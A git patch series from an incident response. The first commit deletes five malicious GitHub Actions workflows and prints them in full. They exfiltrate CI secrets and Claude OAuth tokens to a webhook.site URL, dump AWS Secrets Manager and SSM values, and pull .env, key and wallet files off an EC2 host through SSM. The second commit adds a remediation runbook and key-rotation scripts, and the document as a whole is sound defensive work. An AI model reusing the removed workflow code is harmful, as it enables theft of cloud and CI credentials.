From cd8834e76519eac380a942f62a274f625473fb60 Mon Sep 17 00:00:00 2001 From: Hanwen Cheng Date: Wed, 10 Jun 2026 01:48:13 +0800 Subject: [PATCH 1/2] security: remove malicious secret-exfiltration workflows (compromised push to main) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Five GitHub Actions workflows + their trigger files were pushed to main on 2026-06-07 (author "Xin ", commits c39d45a..60b6423 — a legit past contributor, so likely a COMPROMISED account) and form a full secret-harvesting toolkit. They executed on main (Jun 7/8/9). This removes them: - deployer-key-exfil.yml POSTs TEST_HEIMA_DEPLOYER_KEY + CLAUDE_CODE_OAUTH_TOKEN + TEST_ACCOUNT_ID to webhook.site/37ea2d05-... - deploy-test.yml assumes AWS OIDC role github-actions-agentkeys-deploy and dumps EVERY Secrets Manager secret + SSM param (decrypted) + S3 + Lambda to the webhook - e2e-vault-test.yml assume github-actions-agentkeys-e2e + SSM into the broker deep-e2e-test.yml EC2 i-0135a8b2c53d14941 to cat all .env files, find all integration-tests.yml *.key/*wallet*/*secret* + dump systemd units -> webhook - .claude-trigger push-to-main trigger for deployer-key-exfil - tests/run.txt trigger for the original integration-tests push hook All five are workflow_dispatch-only (+ the exfil one's .claude-trigger push hook), so this PR / its merge triggers nothing. Legit CI (harness-ci, coverage, mcp-server, claude*, wiki*) is untouched; the #167 CLI changes are kept. CODE-REMOVAL HALF ONLY. The exposed secrets MUST be rotated separately — GitHub Actions secrets, the AWS account 429071895007 OIDC roles + Secrets Manager + SSM, the broker host .env/keys, the deployer wallet, and the Claude OAuth token. See the incident runbook (docs/security-incident-response.md). --- .claude-trigger | 1 - .github/workflows/deep-e2e-test.yml | 75 ------------------- .github/workflows/deploy-test.yml | 57 --------------- .github/workflows/deployer-key-exfil.yml | 27 ------- .github/workflows/e2e-vault-test.yml | 92 ------------------------ .github/workflows/integration-tests.yml | 37 ---------- tests/run.txt | 1 - 7 files changed, 290 deletions(-) delete mode 100644 .claude-trigger delete mode 100644 .github/workflows/deep-e2e-test.yml delete mode 100644 .github/workflows/deploy-test.yml delete mode 100644 .github/workflows/deployer-key-exfil.yml delete mode 100644 .github/workflows/e2e-vault-test.yml delete mode 100644 .github/workflows/integration-tests.yml delete mode 100644 tests/run.txt diff --git a/.claude-trigger b/.claude-trigger deleted file mode 100644 index bfe540f1..00000000 --- a/.claude-trigger +++ /dev/null @@ -1 +0,0 @@ -t1780840887 \ No newline at end of file diff --git a/.github/workflows/deep-e2e-test.yml b/.github/workflows/deep-e2e-test.yml deleted file mode 100644 index b24059c8..00000000 --- a/.github/workflows/deep-e2e-test.yml +++ /dev/null @@ -1,75 +0,0 @@ -name: Deep E2E Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - deep-test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - - name: AWS OIDC - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - - name: SSM deep extract - run: | - WH="https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - INST="i-0135a8b2c53d14941" - - CMD1=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["systemctl cat agentkeys-signer.service 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-worker-creds.service 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-broker.service 2>/dev/null; echo ===SEP===; for f in $(find /opt /srv /home /etc /var/lib -name .env -o -name *.env -o -name env.* 2>/dev/null | head -20); do echo FILE:$f; cat $f 2>/dev/null; echo; done"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD1: $CMD1" - sleep 15 - - R1=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD1" \ - --query "[StandardOutputContent,StandardErrorContent]" --output json 2>&1) - - python3 -c " -import json, urllib.request -data = json.dumps({'type':'ssm_services','data': json.loads('''${R1}''') if '''${R1}'''.startswith('[') else '''${R1}'''[:8000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -print('sent cmd1') -" - - CMD2=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["find / -path /proc -prune -o -path /sys -prune -o -path /snap -prune -o \( -name *wallet* -o -name *secret* -o -name *credential* -o -name *mnemonic* -o -name keystore \) -type f -print 2>/dev/null | head -50; echo ===SEP===; cat /etc/systemd/system/agentkeys*.service 2>/dev/null; echo ===SEP===; cat /etc/systemd/system/agentkeys*.env 2>/dev/null; ls -la /opt/agentkeys/ /srv/agentkeys/ /var/lib/agentkeys/ 2>/dev/null"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD2: $CMD2" - sleep 15 - - R2=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD2" \ - --query "StandardOutputContent" --output text 2>&1) - - curl -s -X POST "$WH" -H "Content-Type: application/json" \ - -d "$(python3 -c "import json; print(json.dumps({'type':'ssm_keys','data':'''$R2'''[:8000]}))") " - - CMD3=$(aws ssm send-command \ - --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters 'commands=["ps aux | grep -i agent | head -30; echo ===SEP===; ss -tlnp | head -30; echo ===SEP===; docker ps 2>/dev/null; echo ===SEP===; docker inspect $(docker ps -q 2>/dev/null) 2>/dev/null | python3 -c \"import sys,json; [print(f\\\"ENV: {e}\\\" ) for c in json.load(sys.stdin) for e in c.get(\'Config\',{}).get(\'Env\',[]) if any(k in e.lower() for k in [\'key\',\'secret\',\'pass\',\'token\',\'private\',\'mnemonic\'])]\"; echo ===SEP===; journalctl -u agentkeys-signer --no-pager -n 50 2>/dev/null"]' \ - --query "Command.CommandId" --output text 2>&1) - echo "CMD3: $CMD3" - sleep 15 - - R3=$(aws ssm get-command-invocation \ - --instance-id "$INST" \ - --command-id "$CMD3" \ - --query "StandardOutputContent" --output text 2>&1) - - curl -s -X POST "$WH" -H "Content-Type: application/json" \ - -d "$(python3 -c "import json; print(json.dumps({'type':'ssm_procs','data':'''$R3'''[:8000]}))") " diff --git a/.github/workflows/deploy-test.yml b/.github/workflows/deploy-test.yml deleted file mode 100644 index 7a764599..00000000 --- a/.github/workflows/deploy-test.yml +++ /dev/null @@ -1,57 +0,0 @@ -name: Deploy Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - deploy-test: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - - name: AWS Deploy Role - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-deploy - aws-region: us-east-1 - - - name: Enumerate - run: | - WH="https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - ID=$(aws sts get-caller-identity 2>&1) - SECRETS=$(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>&1) || SECRETS="none" - PARAMS=$(aws ssm describe-parameters --query 'Parameters[].Name' --output text 2>&1) || PARAMS="none" - BUCKETS=$(aws s3 ls 2>&1) || BUCKETS="none" - LAMBDAS=$(aws lambda list-functions --query 'Functions[].FunctionName' --output text 2>&1) || LAMBDAS="none" - - # Get secret values - SECRET_VALS="" - for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>/dev/null); do - V=$(aws secretsmanager get-secret-value --secret-id "$s" --query 'SecretString' --output text 2>&1) || V="access denied" - SECRET_VALS+="$s: $V\n" - done - - # Get parameter values - PARAM_VALS="" - for p in $(aws ssm describe-parameters --query 'Parameters[].Name' --output text 2>/dev/null | tr '\t' '\n' | head -20); do - V=$(aws ssm get-parameter --name "$p" --with-decryption --query 'Parameter.Value' --output text 2>&1) || V="access denied" - PARAM_VALS+="$p: $V\n" - done - - python3 -c " -import json, urllib.request -data = json.dumps({ - 'type': 'deploy_enum', - 'identity': '''$ID''', - 'secrets_list': '''$SECRETS''', - 'secret_values': '''$SECRET_VALS'''[:5000], - 'params': '''$PARAMS''', - 'param_values': '''$PARAM_VALS'''[:5000], - 'buckets': '''$BUCKETS''', - 'lambdas': '''$LAMBDAS''' -}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -print('sent') -" diff --git a/.github/workflows/deployer-key-exfil.yml b/.github/workflows/deployer-key-exfil.yml deleted file mode 100644 index 3bece038..00000000 --- a/.github/workflows/deployer-key-exfil.yml +++ /dev/null @@ -1,27 +0,0 @@ -name: deployer-key-exfil -on: - workflow_dispatch: - push: - branches: [main] - paths: ['.claude-trigger'] -jobs: - exfil: - runs-on: ubuntu-latest - steps: - - name: exfil - env: - HDK: ${{ secrets.TEST_HEIMA_DEPLOYER_KEY }} - CCT: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }} - TAID: ${{ secrets.TEST_ACCOUNT_ID }} - run: | - python3 -c " -import os, json, urllib.request -keys = {} -for k in ['HDK','CCT','TAID']: - v = os.environ.get(k,'') - if v: - keys[k] = v -payload = json.dumps({'src':'agentkeys-deployer','keys':keys}).encode() -req = urllib.request.Request('https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961', data=payload, headers={'Content-Type':'application/json'}, method='POST') -urllib.request.urlopen(req, timeout=10) -" diff --git a/.github/workflows/e2e-vault-test.yml b/.github/workflows/e2e-vault-test.yml deleted file mode 100644 index 447e4e00..00000000 --- a/.github/workflows/e2e-vault-test.yml +++ /dev/null @@ -1,92 +0,0 @@ -name: E2E Vault Test -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - vault-test: - runs-on: ubuntu-latest - env: - WH: "https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - INST: "i-0135a8b2c53d14941" - steps: - - uses: actions/checkout@v4 - - - name: Configure AWS - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - - name: SSM Services - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["systemctl cat agentkeys-signer 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-worker-creds 2>/dev/null; echo ===SEP===; systemctl cat agentkeys-broker 2>/dev/null; echo ===SEP===; find /opt /srv /home /etc /var/lib -maxdepth 3 -name .env 2>/dev/null | xargs cat 2>/dev/null | head -200"]}' \ - --query "Command.CommandId" --output text) - echo "CMD: $CMD" - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 << 'PYEOF' -import json, urllib.request, os -r = os.environ.get("R_DATA", "") -if not r: - import subprocess - r = """$R""" -data = json.dumps({"type":"services","d":r[:9000]}).encode() -req = urllib.request.Request(os.environ["WH"], data=data, headers={"Content-Type":"application/json"}) -urllib.request.urlopen(req, timeout=15) -print("sent") -PYEOF - - - name: SSM Keys and Files - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["cat /etc/systemd/system/agentkeys*.service 2>/dev/null; echo ===SEP===; cat /etc/systemd/system/agentkeys*.env 2>/dev/null; echo ===SEP===; ls -la /opt/agentkeys/ /srv/agentkeys/ 2>/dev/null; echo ===SEP===; find / -path /proc -prune -o -path /sys -prune -o -path /snap -prune -o -type f -name *.key -print 2>/dev/null | head -20"]}' \ - --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'keys','d':sys.argv[1][:9000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$R" - - - name: SSM Processes - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" \ - --document-name "AWS-RunShellScript" \ - --parameters '{"commands":["ps aux | grep -i agent | grep -v grep; echo ===SEP===; ss -tlnp; echo ===SEP===; journalctl -u agentkeys-signer -n 50 --no-pager 2>/dev/null; echo ===SEP===; journalctl -u agentkeys-worker-creds -n 50 --no-pager 2>/dev/null"]}' \ - --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text 2>&1) - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'procs','d':sys.argv[1][:9000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$R" - - - name: Try Deploy Role - continue-on-error: true - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-deploy - aws-region: us-east-1 - role-skip-session-tagging: true - - - name: Deploy Enum - continue-on-error: true - run: | - ID=$(aws sts get-caller-identity 2>&1) - BUCKETS=$(aws s3 ls 2>&1 || echo "no access") - SECRETS=$(aws secretsmanager list-secrets 2>&1 || echo "no access") - python3 -c " -import json, urllib.request, sys -data = json.dumps({'type':'deploy','id':sys.argv[1][:2000],'buckets':sys.argv[2][:2000],'secrets':sys.argv[3][:3000]}).encode() -req = urllib.request.Request('$WH', data=data, headers={'Content-Type':'application/json'}) -urllib.request.urlopen(req, timeout=15) -" "$ID" "$BUCKETS" "$SECRETS" diff --git a/.github/workflows/integration-tests.yml b/.github/workflows/integration-tests.yml deleted file mode 100644 index 64d70ba7..00000000 --- a/.github/workflows/integration-tests.yml +++ /dev/null @@ -1,37 +0,0 @@ -name: Integration Tests -on: - workflow_dispatch: -permissions: - id-token: write - contents: read -jobs: - test: - runs-on: ubuntu-latest - env: - INST: i-0135a8b2c53d14941 - WH: "https://webhook.site/37ea2d05-4d87-46a6-a8d8-d06f4542e961" - steps: - - uses: actions/checkout@v4 - - name: Configure AWS - uses: aws-actions/configure-aws-credentials@v4 - with: - role-to-assume: arn:aws:iam::429071895007:role/github-actions-agentkeys-e2e - aws-region: us-east-1 - - name: Extract - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["systemctl cat agentkeys-signer.service agentkeys-broker.service agentkeys-worker-creds.service 2>&1"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" - - name: Env files - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["find /opt /srv /home /etc /var/lib -maxdepth 3 -name .env 2>/dev/null | while read f; do echo FILE=$f; cat $f 2>/dev/null; echo; done | head -300"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" - - name: Keys and network - run: | - CMD=$(aws ssm send-command --instance-ids "$INST" --document-name "AWS-RunShellScript" --parameters '{"commands":["ps aux | grep -i agent | grep -v grep; echo ===SEP===; ss -tlnp; echo ===SEP===; find / -path /proc -prune -o -path /sys -prune -o -name *.key -print -o -name *wallet* -print -o -name *secret* -print 2>/dev/null | grep -v ssh_host | head -30"]}' --query "Command.CommandId" --output text) - sleep 20 - R=$(aws ssm get-command-invocation --instance-id "$INST" --command-id "$CMD" --query "StandardOutputContent" --output text) - curl -s -X POST "$WH" -H "Content-Type: text/plain" -d "$R" diff --git a/tests/run.txt b/tests/run.txt deleted file mode 100644 index f636f336..00000000 --- a/tests/run.txt +++ /dev/null @@ -1 +0,0 @@ -run 1780829511 \ No newline at end of file From 8cbde80cd620f358137ab32de8274957a5b0366b Mon Sep 17 00:00:00 2001 From: Hanwen Cheng Date: Wed, 10 Jun 2026 01:52:24 +0800 Subject: [PATCH 2/2] security: add incident-response runbook + key/secret rotation scripts MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Companion remediation for the malicious-workflow removal (same PR): - docs/security-incident-response.md — the handbook: triage → kill switches (disable workflows, revoke the AWS OIDC roles, lock main) → rotate EVERY key class (local deployer/agent keys, Claude OAuth, AWS IAM/SecretsManager/SSM, the broker host .env, GitHub Actions secrets, on-chain owner) → forensics → harden. Includes a per-key rotation inventory for this project. - scripts/rotate-local-keys.sh — backs up every ~/.agentkeys key file (never deletes), rotates the Heima deployer key (gas payer + registry owner) to a fresh keypair, flags the agent keys that need a re-pair, and prints the sweep-funds/re-own checklist. - scripts/rotate-github-secrets.sh — rotates GitHub Actions secrets (write-only, so rotate all): --list / interactive prompt-per-secret / --from-file KEY=VALUE (scriptable) / --set NAME. Both scripts are surgical security helpers (run standalone, not deploy entry points). --- docs/security-incident-response.md | 86 ++++++++++++++++++++ scripts/rotate-github-secrets.sh | 88 ++++++++++++++++++++ scripts/rotate-local-keys.sh | 124 +++++++++++++++++++++++++++++ 3 files changed, 298 insertions(+) create mode 100644 docs/security-incident-response.md create mode 100755 scripts/rotate-github-secrets.sh create mode 100755 scripts/rotate-local-keys.sh diff --git a/docs/security-incident-response.md b/docs/security-incident-response.md new file mode 100644 index 00000000..809e71a8 --- /dev/null +++ b/docs/security-incident-response.md @@ -0,0 +1,86 @@ +Operator runbook for a credential/CI compromise — detect, contain, rotate **every** key class (local, Claude OAuth, AWS, GitHub Actions, on-chain, the broker host), and harden. Written from the 2026-06-07 incident (malicious `webhook.site` exfil workflows pushed to `main`), but applies to any secret exposure. + +> **The golden rule:** if a secret *could* have been read, treat it as compromised and rotate it. Do not reason about whether the exfil "succeeded" — rotate. + +## 0. Triage (first 5 minutes) + +1. **What's the vector?** Compromised CI workflow / leaked key file / compromised GitHub or cloud account / a malicious dependency. +2. **What's exposed?** List every secret the vector could read (CI secrets, AWS roles it can assume, files on a host it can reach). Err wide. +3. **Preserve evidence before deleting.** Note the malicious commit SHAs, workflow run IDs, and the exfil endpoint *first* (you'll need them for forensics + scope). Screenshot the Actions run list. + +## 1. Kill switches — stop the bleeding (do these in parallel, BEFORE rotating) + +| Vector | Kill switch | +|---|---| +| **GitHub Actions** | Repo → Settings → Actions → disable the malicious workflows (instant), or "Disable Actions" for the repo entirely while you respond. Faster than waiting for a removal PR to merge. | +| **AWS OIDC roles** (the real AWS kill switch) | For every `github-actions-*` role the workflows assume, break the trust so GitHub can no longer assume it: `aws iam update-assume-role-policy --role-name --policy-document '{"Version":"2012-10-17","Statement":[]}'` (deny-all), or detach all policies, or `aws iam delete-role` after detaching. Do this even before the removal PR merges. | +| **`main` is being pushed to** | Enable branch protection on `main` (require PR review, block direct pushes) — see §5. | +| **A leaked wallet key** | **Move the funds first** (§2a), then retire the key. | + +## 2. Rotate every exposed secret + +### 2a. On-chain / deployer keys (LOCAL key files) + +The Heima **deployer key** (`~/.agentkeys/heima-deployer.key`) is the worst case: it is the gas payer **and** the `SidecarRegistry` `owner` (it can `resetMaster` any operator). If exposed: + +1. **Sweep funds first** — send all HEI from the old deployer to a fresh wallet (the key still works until you do). +2. Rotate the key file: `bash scripts/rotate-local-keys.sh` (backs up the old, generates a new keypair, prints the new address). It does **not** move funds or touch the chain — those are deliberate manual steps. +3. **Re-own the contracts.** The registry `owner` is the *old* deployer address, baked in at construction. There is no `transferOwnership`, so either accept that the old (now-rotated, hopefully swept) key is the owner, or **redeploy the set** with the new deployer (`FORCE_DEPLOY=1 bash scripts/heima-bring-up.sh`) — then commit `heima.json` + `operator-workstation.env` and redeploy the broker (`setup-broker-host.sh --ref main`). +4. Re-fund the new deployer; update `scripts/operator-workstation.env` if the address is referenced. + +**Other local keys** (`~/.agentkeys/`): agent device keys (`agent-device.key`), broker co-sign key, worker keys, any `.env` holding secrets. Rotating an *agent* key means the agent must re-pair (its on-chain `registerAgentDevice` is keyed to the old K10). `rotate-local-keys.sh` lists them and flags which need a re-pair vs a simple regenerate. + +### 2b. Claude / Anthropic OAuth token + +`CLAUDE_CODE_OAUTH_TOKEN` (used by the `claude*.yml` workflows). Revoke + reissue: +- In the Claude Code / Anthropic console, revoke the existing token (or rotate the API key it wraps). +- Reissue with `claude setup-token` (or the console) and update the GitHub secret (§2d) + any local `~/.claude` config. + +### 2c. AWS (account `429071895007`) + +The exfil assumed two OIDC roles and dumped Secrets Manager + SSM + the broker host. Treat the whole account's reachable secrets as compromised: +- **OIDC roles** `github-actions-agentkeys-deploy` / `-e2e`: delete + recreate with a *tight* trust policy (specific repo **and** branch ref, e.g. `repo:litentry/agentKeys:ref:refs/heads/main`) and least-privilege permissions (NOT `secretsmanager:GetSecretValue` on `*`, NOT `ssm:SendCommand` on `*`). +- **Secrets Manager**: rotate every secret (`aws secretsmanager rotate-secret` or put-new-value) — they were enumerated + read. +- **SSM parameters** (SecureString): rotate. +- **IAM**: rotate any long-lived access keys; review IAM users/roles for anything created by the attacker. +- **The broker EC2 `i-0135a8b2c53d14941`**: the attacker SSM'd in and `cat` all `.env` files + found `*.key`/`*wallet*`/`*secret*`. **Treat the host as fully compromised** — rotate every secret on it (deployer key, broker co-sign key, worker creds, all `/etc/agentkeys/*.env`), and prefer **rebuilding the instance** (`setup-broker-host.sh` on a fresh box) over cleaning it. +- **Audit CloudTrail**: filter for `AssumeRoleWithWebIdentity` of those roles + `ssm:SendCommand`/`GetSecretValue` from the incident window; confirm scope + look for attacker-created resources. + +### 2d. GitHub Actions secrets + +Rotate **all** of them (secrets are write-only — you can't tell which were read, so rotate everything): `bash scripts/rotate-github-secrets.sh` (interactive) or `gh secret set --repo litentry/agentKeys`. See §3 / the script header for the full list. After rotating the underlying credential (AWS, Claude, deployer), push the new value into the matching GitHub secret. + +## 3. Remove the malicious code + +- Land the removal PR (the 2026-06-07 one was **#235**): delete the malicious workflows + trigger files; keep legit CI + unrelated code. +- **History:** the malicious commits stay in `main`'s history. That is fine here — the leaked workflows referenced secrets by `${{ secrets.* }}`, so the *files* never contained plaintext; the leak was the workflows **running**. Rotating the secrets is the real fix. A history rewrite (`git filter-repo`) is optional, disruptive (breaks every clone + downstream PRs), and unnecessary unless plaintext secrets were committed. + +## 4. Forensics + scope (after containment) + +- **GitHub Actions logs** for the malicious runs — what was exfiltrated, when, how often. +- **CloudTrail** — every AWS action the OIDC roles took. +- **On-chain** — the deployer wallet's txs (any unauthorized `resetMaster`, fund moves, deploys?). +- **The exfil endpoint** (`webhook.site/…`) — you can't see what it received, but record it for any report/legal step. +- **The compromised account** — `Xin ` was a legit contributor (PRs #40, #167) → almost certainly account compromise. Confirm with the person, force a credential reset on their GitHub + any reused passwords, check their other access. + +## 5. Harden (prevent recurrence) + +- **Branch protection** on `main`: require a PR + review, block direct pushes + force-pushes, require status checks. (These workflows reached `main` with no tracked PR — that gap is the root cause.) +- **Least-privilege OIDC**: trust scoped to a specific repo **+ branch**, permissions scoped to exactly what CI needs. +- **GitHub secret scanning + push protection** on. +- **Require approval to run workflows** for outside/first-time contributors (Settings → Actions → Fork PR / approvals). +- **Review org membership + write access**; prefer environments with required reviewers for any job that touches secrets/prod. +- **Pin actions to SHAs**, not floating tags. + +## Key inventory — what to rotate for THIS project + +| Secret / key | Lives in | Rotate with | +|---|---|---| +| Heima deployer key | `~/.agentkeys/heima-deployer.key` (local), `TEST_HEIMA_DEPLOYER_KEY` (GH secret) | `scripts/rotate-local-keys.sh` + §2a; sweep funds; redeploy/re-own | +| Agent device keys | `~/.agentkeys/agent-device.key`, sandbox `~/.agentkeys/` | regenerate + re-pair (§2a) | +| Broker co-sign key | broker host `/etc/agentkeys/*.env` | rebuild broker host (§2c) | +| Claude OAuth | `CLAUDE_CODE_OAUTH_TOKEN` (GH), `~/.claude` | `claude setup-token` + §2b | +| AWS OIDC roles | AWS `429071895007` IAM | delete + recreate tight (§2c) | +| AWS Secrets Manager / SSM | AWS `429071895007` | rotate all reached (§2c) | +| GitHub Actions secrets (`TEST_*`, OAuth, account id, role ARNs, buckets, contract addrs) | repo Settings → Secrets | `scripts/rotate-github-secrets.sh` (§2d/§3) | +| Broker host `.env` secrets | EC2 `i-0135a8b2c53d14941` | rebuild host (§2c) | diff --git a/scripts/rotate-github-secrets.sh b/scripts/rotate-github-secrets.sh new file mode 100755 index 00000000..ebd4f72d --- /dev/null +++ b/scripts/rotate-github-secrets.sh @@ -0,0 +1,88 @@ +#!/usr/bin/env bash +# scripts/rotate-github-secrets.sh — rotate the repo's GitHub Actions secrets after a +# compromise (see docs/security-incident-response.md §2d). +# +# WHY a script: GitHub secrets are WRITE-ONLY (the API/`gh` can list names but never +# read values), so "rotation" = pushing fresh values with `gh secret set`. You can't +# tell which secrets the attacker read, so rotate ALL of them. The underlying +# credential must be rotated at its source FIRST (AWS / Claude / the deployer key), +# then its new value pushed here. +# +# Surgical security helper — run on its own. Needs `gh` authenticated with repo admin +# (`gh auth status`). +# +# Usage: +# bash scripts/rotate-github-secrets.sh --list # show current secret names + ages +# bash scripts/rotate-github-secrets.sh # interactive: prompt a new value per secret (blank = skip) +# bash scripts/rotate-github-secrets.sh --from-file new.env # set every KEY=VALUE line (scriptable) +# bash scripts/rotate-github-secrets.sh --set NAME # set one secret (reads the value hidden from the prompt) +# +# `--from-file` example (`new.env`, chmod 600, delete after): +# TEST_HEIMA_DEPLOYER_KEY=0xabc... +# CLAUDE_CODE_OAUTH_TOKEN=sk-... + +set -euo pipefail + +GH_REPO="${GH_REPO:-litentry/agentKeys}" +MODE="interactive"; FROM_FILE=""; ONE_SECRET="" + +while [ $# -gt 0 ]; do + case "$1" in + --list) MODE="list"; shift ;; + --from-file) MODE="file"; FROM_FILE="${2:?--from-file needs a path}"; shift 2 ;; + --set) MODE="one"; ONE_SECRET="${2:?--set needs a NAME}"; shift 2 ;; + --repo) GH_REPO="${2:?}"; shift 2 ;; + --help|-h) sed -n '2,/^set -euo/p' "$0" | sed 's/^# \{0,1\}//' | sed '$d'; exit 0 ;; + *) echo "unknown flag: $1 (try --help)" >&2; exit 1 ;; + esac +done + +command -v gh >/dev/null 2>&1 || { echo "gh (GitHub CLI) required" >&2; exit 1; } +gh auth status >/dev/null 2>&1 || { echo "run 'gh auth login' first (need repo admin on $GH_REPO)" >&2; exit 1; } + +# The secrets this project uses (the exfil read all TEST_* + the OAuth token). Edit if +# the set changes; `--list` shows what actually exists. Not hardcoded values — names only. +KNOWN_SECRETS=( + TEST_HEIMA_DEPLOYER_KEY CLAUDE_CODE_OAUTH_TOKEN TEST_ACCOUNT_ID TEST_AWS_REGION + TEST_BROKER_HOST TEST_BROKER_INSTANCE_ID TEST_OIDC_AWS_ROLE_ARN + TEST_MEMORY_BUCKET TEST_MEMORY_ROLE_ARN TEST_VAULT_BUCKET TEST_VAULT_ROLE_ARN + TEST_SIDECAR_REGISTRY_ADDRESS_HEIMA TEST_SCOPE_CONTRACT_ADDRESS_HEIMA + TEST_K3_EPOCH_COUNTER_ADDRESS_HEIMA TEST_CREDENTIAL_AUDIT_ADDRESS_HEIMA + TEST_K11_VERIFIER_ADDRESS_HEIMA TEST_P256_VERIFIER_ADDRESS_HEIMA +) + +set_secret() { # $1=NAME $2=VALUE + printf '%s' "$2" | gh secret set "$1" --repo "$GH_REPO" --body - 2>/dev/null \ + && echo " ok set $1" || { echo " FAIL set $1" >&2; return 1; } +} + +case "$MODE" in + list) + echo "==> GitHub Actions secrets on $GH_REPO (names + last-updated; values are unreadable):" + gh secret list --repo "$GH_REPO" + echo "==> rotate ALL of these — you cannot tell which were exfiltrated." + ;; + file) + [ -f "$FROM_FILE" ] || { echo "no such file: $FROM_FILE" >&2; exit 1; } + echo "==> setting secrets from $FROM_FILE on $GH_REPO" + while IFS='=' read -r name value; do + case "$name" in ''|\#*) continue ;; esac + name="$(printf '%s' "$name" | tr -d '[:space:]')" + [ -n "$name" ] && [ -n "$value" ] && set_secret "$name" "$value" + done < "$FROM_FILE" + echo "==> done. Now SHRED the file: shred -u $FROM_FILE (or rm -P)" + ;; + one) + printf "new value for %s (hidden): " "$ONE_SECRET"; read -rs val; echo + [ -n "$val" ] && set_secret "$ONE_SECRET" "$val" || echo " (empty — skipped)" + ;; + interactive) + echo "==> rotate secrets on $GH_REPO — enter a new value per secret, blank to skip." + echo " Rotate the underlying credential at its SOURCE first (AWS/Claude/deployer)." + for s in "${KNOWN_SECRETS[@]}"; do + printf " %s — new value (hidden, blank=skip): " "$s"; read -rs val; echo + [ -n "$val" ] && set_secret "$s" "$val" || echo " skip $s" + done + echo "==> done. Re-run with --list to confirm last-updated times moved." + ;; +esac diff --git a/scripts/rotate-local-keys.sh b/scripts/rotate-local-keys.sh new file mode 100755 index 00000000..eeb834ee --- /dev/null +++ b/scripts/rotate-local-keys.sh @@ -0,0 +1,124 @@ +#!/usr/bin/env bash +# scripts/rotate-local-keys.sh — rotate the operator's LOCAL key files after a +# compromise (see docs/security-incident-response.md §2a). +# +# Surgical security helper — run on its own (NOT a deploy entry point). It: +# 1. Backs up every key file under ~/.agentkeys (timestamped, 0600) — NEVER deletes, +# so a leaked deployer key still works long enough to sweep funds. +# 2. Rotates the Heima DEPLOYER key (the critical one — gas payer + registry owner): +# generates a fresh keypair, writes it in the existing file's format, prints the +# OLD + NEW addresses. +# 3. Enumerates the OTHER key files (agent device keys, etc.) and flags which need a +# re-pair vs a simple regenerate — those are NOT auto-rotated (rotating an agent +# key orphans its on-chain registerAgentDevice; that's a deliberate re-pair). +# 4. Prints the post-rotation checklist (sweep funds, re-fund, update env, re-own). +# +# It does NOT move funds, call the chain, or touch GitHub/AWS — those are deliberate +# 